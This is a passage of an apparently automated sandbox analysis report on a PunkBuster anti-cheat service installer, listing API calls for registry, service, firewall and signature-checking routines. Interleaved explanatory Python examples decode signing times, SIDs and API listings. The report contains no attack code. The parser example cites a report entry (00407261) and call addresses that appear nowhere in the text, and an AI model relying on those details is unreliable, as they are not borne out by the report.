                                               • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorFormatFreeH_prologLastLocalMessage
                                              • String ID: **ERROR: %s: %s$Message
                                              • API String ID: 759219404-2348020675
                                              • Opcode ID: 22a5b4929c1e5629f02158e92ff0c09a888a439f7db0ddde2c840bdb6b1484fb
                                              • Instruction ID: 6bda246ea51a2eb7aaa526fdd861ceddc48ebf66c57801f6c4823909223e4e6e
                                              • Opcode Fuzzy Hash: 22a5b4929c1e5629f02158e92ff0c09a888a439f7db0ddde2c840bdb6b1484fb
                                              • Instruction Fuzzy Hash: B42132B194015CEFDB10EB94CC81EEDB7B8AB04318F5081BAB615621E2D6785B85CF69
                                              APIs
                                              • lstrcmp.KERNEL32(1.3.6.1.4.1.311.2.1.12,?), ref: 0040852B
                                              • CryptDecodeObject.CRYPT32(00010001,1.3.6.1.4.1.311.2.1.12,?,?,00000000,00000000,?), ref: 00408553
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00408569
                                              • CryptDecodeObject.CRYPT32(00010001,1.3.6.1.4.1.311.2.1.12,?,?,00000000,?,?), ref: 00408595
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CryptDecodeObject$AllocLocallstrcmp
                                              • String ID: 1.3.6.1.4.1.311.2.1.12
                                              • API String ID: 3284379815-2596186611
                                              • Opcode ID: 97ffdf57a553b8638c6a0d76eebed708acadcd14246dfc87692436479d3a763c
                                              • Instruction ID: c873b066cdd88eb137005279340a5094d2e94afccd150f66e497f36c002e7681
                                              • Opcode Fuzzy Hash: 97ffdf57a553b8638c6a0d76eebed708acadcd14246dfc87692436479d3a763c
                                              • Instruction Fuzzy Hash: CE416331900606EFCF208F95C94099ABBB4FF08310B15846EE995BB692DF75ED80CF58
                                              APIs
                                              • lstrcmp.KERNEL32(?,1.2.840.113549.1.9.6), ref: 0040870A
                                              • CryptDecodeObject.CRYPT32(00010001,000001F4,?,?,00000000,00000000,?), ref: 0040873C
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0040874A
                                              • CryptDecodeObject.CRYPT32(00010001,000001F4,?,?,00000000,00000000,?), ref: 00408776
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CryptDecodeObject$AllocLocallstrcmp
                                              • String ID: 1.2.840.113549.1.9.6
                                              • API String ID: 3284379815-2921522063
                                              • Opcode ID: 1c03ec7a59233b454a33b4503108e448d365118ad8ecf43816259d6b52f441a0
                                              • Instruction ID: a788b97eae109580f0cac5c22c45467d660d294b5013f0328b589f60dcf9ace9
                                              • Opcode Fuzzy Hash: 1c03ec7a59233b454a33b4503108e448d365118ad8ecf43816259d6b52f441a0
                                              • Instruction Fuzzy Hash: FA218C71A4020AEFDB11CF95CD41B99BBB4BF58304F20406AEA50BB2A5DBB5E940CB18
                                              APIs
                                              • lstrcmp.KERNEL32(1.2.840.113549.1.9.5,?), ref: 0040865E
                                              • CryptDecodeObject.CRYPT32(00010001,1.2.840.113549.1.9.5,?,00000008,00000000,?,00000008), ref: 0040869A
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004086AC
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 004086B9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Time$File$CryptDecodeLocalObjectSystemlstrcmp
                                              • String ID: 1.2.840.113549.1.9.5
                                              • API String ID: 1508694121-925610549
                                              • Opcode ID: 86d0d2358ef50f1fe37fed75dc18d9d99c9f79cf8d992799e0c2c3ea88eaf1c7
                                              • Instruction ID: f212b015d127512b5763636b9bb1128a0e4d06747a3459900feecbf1282a5b97
                                              • Opcode Fuzzy Hash: 86d0d2358ef50f1fe37fed75dc18d9d99c9f79cf8d992799e0c2c3ea88eaf1c7
                                              • Instruction Fuzzy Hash: 52118E71900208EFCB00CF84C984AEEBBB8FF58340F10446AE946A7660DB71E985CB54
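                                               The three routines above all follow the same pattern: lstrcmp an attribute OID string, then CryptDecodeObject the attribute value. The one at 0040865E handles signingTime (1.2.840.113549.1.9.5) and gets back an 8-byte FILETIME, which it feeds to FileTimeToLocalFileTime and FileTimeToSystemTime. The following is an added example, not code from the sample or from Joe Sandbox, that reproduces that step in portable Python: it parses a DER Attribute, checks the OID, decodes the UTCTime/GeneralizedTime and converts it to the FILETIME tick count the API returns. The DER bytes at the bottom are constructed for this illustration; the OID decoder is general and also renders the opus-info (1.3.6.1.4.1.311.2.1.12) and counterSignature (1.2.840.113549.1.9.6) OIDs compared in the neighbouring functions.

```python
"""Decode a PKCS#7 signingTime attribute (OID 1.2.840.113549.1.9.5) and express it
as a Windows FILETIME, the 8-byte value the sampled function hands to
FileTimeToLocalFileTime/FileTimeToSystemTime. Pure Python, no CryptoAPI; the DER
sample at the bottom is constructed for this example."""
from datetime import datetime, timezone

SIGNING_TIME_OID = "1.2.840.113549.1.9.5"   # pkcs-9 signingTime
WINDOWS_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def read_tlv(buf, pos):
    """Parse one DER tag-length-value at pos; return (tag, value, next_pos).
    Supports short and long (multi-byte) length forms."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def decode_oid(body):
    """Dotted-decimal form of a DER OBJECT IDENTIFIER body (base-128 arcs)."""
    arcs = [body[0] // 40, body[0] % 40]
    acc = 0
    for b in body[1:]:
        acc = (acc << 7) | (b & 0x7F)      # high bit set = more bytes follow
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    return ".".join(str(a) for a in arcs)


def decode_time(tag, body):
    """UTCTime (0x17, YYMMDDhhmmssZ) or GeneralizedTime (0x18, YYYYMMDDhhmmssZ) -> aware datetime."""
    s = body.decode("ascii")
    if tag == 0x17:
        yy = int(s[:2])
        year = 1900 + yy if yy >= 50 else 2000 + yy   # RFC 5280 two-digit year rule
        rest = s[2:]
    elif tag == 0x18:
        year, rest = int(s[:4]), s[4:]
    else:
        raise ValueError("unexpected time tag 0x%02x" % tag)
    if len(rest) != 11 or not rest.endswith("Z"):
        raise ValueError("DER requires MMDDhhmmssZ")
    return datetime(year, int(rest[0:2]), int(rest[2:4]), int(rest[4:6]),
                    int(rest[6:8]), int(rest[8:10]), tzinfo=timezone.utc)


def to_filetime(dt):
    """Windows FILETIME: 100-nanosecond ticks since 1601-01-01 00:00:00 UTC."""
    delta = dt - WINDOWS_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def attribute_oid(attr):
    """OID of a DER Attribute ::= SEQUENCE { type OID, values SET OF ANY }."""
    tag, seq, _ = read_tlv(attr, 0)
    if tag != 0x30:
        raise ValueError("attribute must be a SEQUENCE")
    tag, oid_body, _ = read_tlv(seq, 0)
    if tag != 0x06:
        raise ValueError("expected OBJECT IDENTIFIER")
    return decode_oid(oid_body)


def decode_signing_time(attr):
    """Mirror the sampled routine: compare the OID, decode the value, return
    (datetime, 8-byte little-endian FILETIME). Raises if the attribute is not signingTime."""
    if attribute_oid(attr) != SIGNING_TIME_OID:          # the lstrcmp step
        raise ValueError("not a signingTime attribute")
    _, seq, _ = read_tlv(attr, 0)
    _, _, pos = read_tlv(seq, 0)                          # skip the OID
    tag, values, _ = read_tlv(seq, pos)
    if tag != 0x31:
        raise ValueError("expected SET OF values")
    tag, time_body, _ = read_tlv(values, 0)
    dt = decode_time(tag, time_body)                      # the CryptDecodeObject step
    return dt, to_filetime(dt).to_bytes(8, "little")


# Constructed sample attribute: signingTime = 2023-04-15 12:00:00Z (not taken from the report).
SAMPLE_ATTRIBUTE = bytes.fromhex(
    "301c"                                  # SEQUENCE, 28 bytes
    "06092a864886f70d010905"                # OID 1.2.840.113549.1.9.5
    "3111"                                  # SET, 17 bytes
    "170d3233303431353132303030305a"        # UTCTime "230415120000Z"
)

if __name__ == "__main__":
    when, ft = decode_signing_time(SAMPLE_ATTRIBUTE)
    print(when.isoformat(), ft.hex())
```

                                               The FILETIME is kept in UTC here; the sample's FileTimeToLocalFileTime call applies the analysis machine's time zone afterwards, which is why a signing time read from a sandbox run can differ by the host offset from the value in the PKCS#7 blob.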
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00406322
                                              • CoCreateInstance.OLE32(004E8254,00000000,00000001,004E8264,?), ref: 0040634B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateH_prologInstance
                                              • String ID: Message$get_LocalPolicy failed: 0x%08lx
                                              • API String ID: 457505298-1432678775
                                              • Opcode ID: ae59d5c511ced1d424170903cafecce15efe742eec3dbc4535d189b62bf81f0b
                                              • Instruction ID: 249664490226cffe886a95c969e3a1f1bb7c66dd1e282c0fdea98710dae82b57
                                              • Opcode Fuzzy Hash: ae59d5c511ced1d424170903cafecce15efe742eec3dbc4535d189b62bf81f0b
                                              • Instruction Fuzzy Hash: F231C270900259AFCB00DF95C8C5EAEB7B8AF44314F10456EF916E72D1C7749E45CBA5
                                              APIs
                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,0040D2D4,64-bit,00000000), ref: 004090A6
                                              • CheckTokenMembership.ADVAPI32(00000000,?,0040D2D4,?,0040D2D4,64-bit,00000000,00000000), ref: 004090BB
                                              • FreeSid.ADVAPI32(?,?,0040D2D4,64-bit,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004090CB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                              • String ID:
                                              • API String ID: 3429775523-0
                                              • Opcode ID: 0084a8df59852fb23f4d842f0e280472506688cdee7ca5d4ae6dbb38f93792d0
                                              • Instruction ID: 0093eee121a347d177201e0670dc03f8a1d7b9820f7e5e488a3c2593e256f184
                                              • Opcode Fuzzy Hash: 0084a8df59852fb23f4d842f0e280472506688cdee7ca5d4ae6dbb38f93792d0
                                              • Instruction Fuzzy Hash: F7017171944288EFDB00DBE4CC84AEEBB78FB14204F4444AAE101B3292D7705A44CB29
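                                               The AllocateAndInitializeSid / CheckTokenMembership / FreeSid sequence above is the standard "is the caller an administrator" test: a SID is built from nSubAuthorityCount=2 with sub-authorities 0x20 (SECURITY_BUILTIN_DOMAIN_RID) and 0x220 (DOMAIN_ALIAS_RID_ADMINS), and the token is checked for membership in it. The listing does not recover the identifier-authority argument ("?"). The following is an added example, not code from the sample or from Joe Sandbox, that rebuilds the binary SID from the report's argument values and renders it as text; it assumes the unrecovered authority is SECURITY_NT_AUTHORITY (5), which is what this check uses in practice, and labels that assumption in the code.

```python
"""Rebuild the SID that AllocateAndInitializeSid produces from the argument values
recorded in the report and render it as text, so the CheckTokenMembership call can
be read for what it tests. Pure Python; no Windows API involved.
The identifier-authority argument is '?' (unrecovered) in the listing and is assumed
here to be SECURITY_NT_AUTHORITY (5)."""
import struct

SECURITY_NT_AUTHORITY = 5            # assumption: not recovered by the sandbox
# Argument list copied from the report's AllocateAndInitializeSid line:
# pIdentifierAuthority, nSubAuthorityCount, eight sub-authority slots, pSid.
REPORT_ARGS = "?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?"
# Well-known SIDs the result is compared against (values from winnt.h).
WELL_KNOWN = {"S-1-5-32-544": "BUILTIN\\Administrators", "S-1-5-18": "NT AUTHORITY\\SYSTEM"}


def build_sid(authority, *sub_authorities):
    """Binary SID as Windows lays it out: revision(1) | count(1) |
    identifier authority (6 bytes, big-endian) | sub-authorities (4 bytes each, little-endian)."""
    if not 1 <= len(sub_authorities) <= 15:
        raise ValueError("a SID carries 1..15 sub-authorities")
    return (struct.pack("<BB", 1, len(sub_authorities))
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in sub_authorities))


def sid_to_string(sid):
    """Parse the binary layout back to S-R-I-S... text (what ConvertSidToStringSid returns)."""
    revision, count = struct.unpack_from("<BB", sid, 0)
    if revision != 1 or len(sid) != 8 + 4 * count:
        raise ValueError("malformed SID")
    authority = int.from_bytes(sid[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, sid, 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))


def sid_from_report_args(args, assumed_authority=SECURITY_NT_AUTHORITY):
    """Turn the sandbox's hex argument list into a SID string.
    Only the first nSubAuthorityCount of the eight slots are meaningful."""
    tokens = [t.strip() for t in args.split(",")]
    authority = assumed_authority if tokens[0] == "?" else int(tokens[0], 16)
    count = int(tokens[1], 16)
    subs = [int(t, 16) for t in tokens[2:2 + count]]
    return sid_to_string(build_sid(authority, *subs))


def describe(sid_string):
    """Name the account if it is one of the well-known SIDs above."""
    return WELL_KNOWN.get(sid_string, "unknown")


if __name__ == "__main__":
    s = sid_from_report_args(REPORT_ARGS)
    print(s, describe(s))
```

                                               Read together with the "64-bit" string on the same stack, this is the installer-style branch that decides whether to proceed with privileged setup or request elevation; CheckTokenMembership is also the path IsUserAnAdmin takes internally.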
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                              • Instruction ID: bdc00cd6b65ee0f6ee7ee328d437f288e7a79eff7ae3f2207484cd450b30d8cb
                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                              • Instruction Fuzzy Hash: C0117D7720015243D6048A3DDCB45FBE7D5EBD532072C637BD84A8B748D22ED95E9628

                                              Control-flow Graph

                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004073EF
                                              • GetSystemDirectoryA.KERNEL32(?,00000400), ref: 00407463
                                                • Part of subcall function 004BC79F: __lock.LIBCMT ref: 004BC7BD
                                                • Part of subcall function 004BC79F: HeapFree.KERNEL32(00000000,?,0050EE00,0000000C,004C280D,00000000,0050F518,00000008,004C2842,?,?,?,004BD45A,00000004,0050EE80,0000000C), ref: 004BC804
                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall\PunkBusterSvc\,00000000,000F003F,?), ref: 00407555
                                              • RegCreateKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall\PunkBusterSvc\,?), ref: 00407568
                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall\PunkBusterSvc\,00000000,000F003F,?), ref: 0040757D
                                              • _strlen.LIBCMT ref: 004075A3
                                              • RegSetValueExA.ADVAPI32(?,UninstallString,00000000,00000002,?,00000001), ref: 004075C8
                                              • _strlen.LIBCMT ref: 004075D0
                                              • RegSetValueExA.ADVAPI32(?,DisplayName,00000000,00000002,PunkBuster Services,00000001), ref: 004075E7
                                              • _strlen.LIBCMT ref: 0040760D
                                              • RegSetValueExA.ADVAPI32(?,DisplayVersion,00000000,00000002,?,00000001), ref: 0040762C
                                              • _strlen.LIBCMT ref: 00407634
                                              • RegSetValueExA.ADVAPI32(?,HelpLink,00000000,00000002,http://www.evenbalance.com/index.php?page=pbsvcfaq.php,00000001), ref: 0040764B
                                              • _strlen.LIBCMT ref: 0040764E
                                              • RegSetValueExA.ADVAPI32(?,URLInfoAbout,00000000,00000002,http://www.evenbalance.com/index.php?page=pbsvcfaq.php,00000001), ref: 00407665
                                              • _strlen.LIBCMT ref: 0040766D
                                              • RegSetValueExA.ADVAPI32(?,Publisher,00000000,00000002,Even Balance, Inc.,00000001), ref: 00407684
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Similarity
                                              • API ID: Value_strlen$Open$CreateDirectoryFreeH_prologHeapSystem__lock
                                              • String ID: -u$%d.%d$DisplayName$DisplayVersion$Even Balance, Inc.$HelpLink$Publisher$PunkBuster Services$Software\Microsoft\Windows\CurrentVersion\Uninstall\PunkBusterSvc\$URLInfoAbout$UninstallString$http://www.evenbalance.com/index.php?page=pbsvcfaq.php
                                              • API String ID: 1366487629-2471671963
                                              • Opcode ID: 3f66010ca4bbd8cec7424b12d3089067c989c62d95de6c32389d2ecf475b48bc
                                              • Instruction ID: 3b5f2e55fd99b0cb6fb53e510ead61fc6bd0a11c4e949306d876edae8efe3064
                                              • Opcode Fuzzy Hash: 3f66010ca4bbd8cec7424b12d3089067c989c62d95de6c32389d2ecf475b48bc
                                              • Instruction Fuzzy Hash: 9071A27194015CBADB21AB618C82EEE77BCEF44704F1080BBB545B6192CE785E818FE8

                                              Control-flow Graph

                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0040A20D
                                                • Part of subcall function 0040A0F2: __EH_prolog.LIBCMT ref: 0040A0F7
                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000), ref: 0040A347
                                                • Part of subcall function 0040953E: __EH_prolog.LIBCMT ref: 00409543
                                              • OpenServiceA.ADVAPI32(00000000,PnkBstrA,000F01FF,?,00000000), ref: 0040A47A
                                              • CloseServiceHandle.ADVAPI32(?,?,00000000), ref: 0040A4AD
                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000), ref: 0040A4B6
                                              Strings
                                              • This program will help you install or un-install the PunkBuster Anti-cheat service.Please make your selection and then click "Next" to continue., xrefs: 0040A4E3
                                              • Install/Re-Install PunkBuster Service, xrefs: 0040A258
                                              • radioBox, xrefs: 0040A291
                                              • button, xrefs: 0040A3D8
                                              • Message, xrefs: 0040A361
                                              • Un-Install/Remove PunkBuster Service, xrefs: 0040A269
                                              • staticText, xrefs: 0040A4D2
                                              • PnkBstrA, xrefs: 0040A472
                                              • **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer., xrefs: 0040A36E
                                              • , xrefs: 0040A52A
                                              • &Test Services, xrefs: 0040A3E9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: H_prologService$CloseHandleOpen$Manager
                                              • String ID: This program will help you install or un-install the PunkBuster Anti-cheat service.Please make your selection and then click "Next" to continue.$ $ **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer.$&Test Services$Install/Re-Install PunkBuster Service$Message$PnkBstrA$Un-Install/Remove PunkBuster Service$button$radioBox$staticText
                                              • API String ID: 81804430-3789358379
                                              • Opcode ID: c08c51f1ec922e4f2c132f83c3c504c1061ff5f93906ae0e8dfd2920e58565db
                                              • Instruction ID: 9234b14ef658502d59a1c728953b6f4821128c5ba5519474f5c4182507258a31
                                              • Opcode Fuzzy Hash: c08c51f1ec922e4f2c132f83c3c504c1061ff5f93906ae0e8dfd2920e58565db
                                              • Instruction Fuzzy Hash: 48C18D70900349AEDB10EFA5CC46BEFBBB4AF04308F50456EF555B62D2CBB85A44CB69
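
The API listings in this report are a flat, address-ordered dump of call sites, which is tedious to read across dozens of function entries. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses lines in the report's own `Name.MODULE(args), ref: ADDR` layout into records and pulls out the host artifacts named in the 004073EF entry above (the Uninstall registry key and the values written under it) and in the 0040A20D entry above and the 00407261 entry further down (the PnkBstrA service name). The sample text is copied from those entries; the record layout, the hive table, and the handling of a comma inside string data (the Publisher value "Even Balance, Inc." would otherwise shift every later argument) are this example's own choices. The key/value pairing is a static approximation: the listing is ordered by call-site address and is not an execution trace, and a "?" argument is one the sandbox could not resolve statically.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: API-listing lines copied from the 004073EF (registry) and
# 00407261 (service) function entries of this report, in the report's own
# "Name.MODULE(args), ref: ADDR" layout. Nothing else on the page is parsed here.
SAMPLE = r"""
• __EH_prolog.LIBCMT ref: 004073EF
• GetSystemDirectoryA.KERNEL32(?,00000400), ref: 00407463
  • Part of subcall function 004BC79F: HeapFree.KERNEL32(00000000,?,0050EE00,0000000C), ref: 004BC804
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall\PunkBusterSvc\,00000000,000F003F,?), ref: 00407555
• RegCreateKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall\PunkBusterSvc\,?), ref: 00407568
• RegSetValueExA.ADVAPI32(?,UninstallString,00000000,00000002,?,00000001), ref: 004075C8
• RegSetValueExA.ADVAPI32(?,DisplayName,00000000,00000002,PunkBuster Services,00000001), ref: 004075E7
• RegSetValueExA.ADVAPI32(?,Publisher,00000000,00000002,Even Balance, Inc.,00000001), ref: 00407684
• OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407283
• OpenServiceA.ADVAPI32(00000000,PnkBstrA,000F01FF), ref: 004072F9
"""

# One listing line: a bullet, an optional "Part of subcall function X:" prefix,
# Name.MODULE, optional "(args)", then "ref: ADDR". The comma before "ref" is
# absent when there are no parentheses (e.g. "__EH_prolog.LIBCMT ref: 004073EF").
# The regex is this example's assumption about the report layout, not a Joe Sandbox API.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function ([0-9A-Fa-f]{8}):\s*)?"
    r"([A-Za-z0-9_@]+)\.([A-Za-z0-9_]+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]{8})\s*$"
)

# Predefined registry hive handles as they appear in the first RegOpenKey/RegCreateKey argument.
HIVES = {0x80000000: "HKCR", 0x80000001: "HKCU", 0x80000002: "HKLM", 0x80000003: "HKU"}


@dataclass
class ApiCall:
    name: str
    module: str
    raw_args: str               # argument text exactly as listed; "?" = not resolved statically
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # callee address when the line is "Part of subcall function"

    @property
    def args(self) -> List[str]:
        # Naive comma split; use split_with_data_arg() for APIs whose string data may contain commas.
        return self.raw_args.split(",") if self.raw_args else []


def parse_api_listing(text: str) -> List[ApiCall]:
    """Parse every API line of a function entry into ApiCall records.
    Lines that do not match (headings, strings, memory-dump sources) are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        sub, name, module, raw_args, ref = m.groups()
        calls.append(ApiCall(name, module, raw_args or "", int(ref, 16),
                             int(sub, 16) if sub else None))
    return calls


def split_with_data_arg(raw_args: str, arity: int, data_idx: int) -> List[str]:
    """Split an argument list whose arity is known from the API prototype.
    Surplus comma-separated pieces can only come from the data argument at
    data_idx, so they are rejoined into it; the arguments after it are kept intact."""
    parts = raw_args.split(",")
    if len(parts) <= arity:
        return parts
    n_tail = arity - data_idx - 1                 # arguments that follow the data argument
    tail = parts[len(parts) - n_tail:] if n_tail else []
    data = ",".join(parts[data_idx:len(parts) - n_tail])
    return parts[:data_idx] + [data] + tail


def _hex(s: str) -> Optional[int]:
    try:
        return int(s, 16)
    except ValueError:                            # "?" or a string argument
        return None


def registry_values_written(calls: List[ApiCall]) -> List[Tuple[str, str, str]]:
    """Pair each RegSetValueEx* with the most recently opened or created key.
    Returns (key path, value name, data); the handle itself is listed as "?"."""
    current_key = "?"
    written = []
    for c in calls:
        if c.name in ("RegOpenKeyExA", "RegOpenKeyExW", "RegCreateKeyA", "RegCreateKeyW"):
            hive = HIVES.get(_hex(c.args[0]), c.args[0])
            current_key = hive + "\\" + c.args[1].rstrip("\\")
        elif c.name in ("RegSetValueExA", "RegSetValueExW"):
            # RegSetValueEx(hKey, lpValueName, Reserved, dwType, lpData, cbData): 6 args, data at index 4
            a = split_with_data_arg(c.raw_args, arity=6, data_idx=4)
            written.append((current_key, a[1], a[4]))
    return written


def services_opened(calls: List[ApiCall]) -> List[str]:
    """Service names passed to OpenService*; these are the names to query on a host."""
    return [c.args[1] for c in calls if c.name in ("OpenServiceA", "OpenServiceW")]


if __name__ == "__main__":
    parsed = parse_api_listing(SAMPLE)
    for key, value, data in registry_values_written(parsed):
        print(f"{key} : {value} = {data}")
    print("services:", services_opened(parsed))
```

The same parser can be pointed at any other function entry on the page by pasting its API lines into the text; only the two extraction helpers are specific to registry and service calls.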

                                              Control-flow Graph

                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00406666
                                                • Part of subcall function 0040649F: __EH_prolog.LIBCMT ref: 004064A4
                                                • Part of subcall function 0040649F: SysFreeString.OLEAUT32(?), ref: 00406630
                                              • SysFreeString.OLEAUT32(?), ref: 004069DD
                                              • SysFreeString.OLEAUT32(?), ref: 004069E2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: FreeString$H_prolog
                                              • String ID: Add failed: 0x%08lx$CoCreateInstance failed: 0x%08lx$Message$SysAllocString failed: 0x%08lx$WindowsFirewallAppIsEnabled failed: 0x%08lx$get_AuthorizedApplications failed: 0x%08lx$put_Name failed: 0x%08lx$put_ProcessImageFileName failed: 0x%08lx
                                              • API String ID: 1529728701-3210245531
                                              • Opcode ID: e017854d60634fd897c017ee63a1a635657d21458fa4df3517fe17c0784f15a3
                                              • Instruction ID: ec26c372339b50ef718af20037966b0fc6ad395da82280a397e0c79cd1b3e807
                                              • Opcode Fuzzy Hash: e017854d60634fd897c017ee63a1a635657d21458fa4df3517fe17c0784f15a3
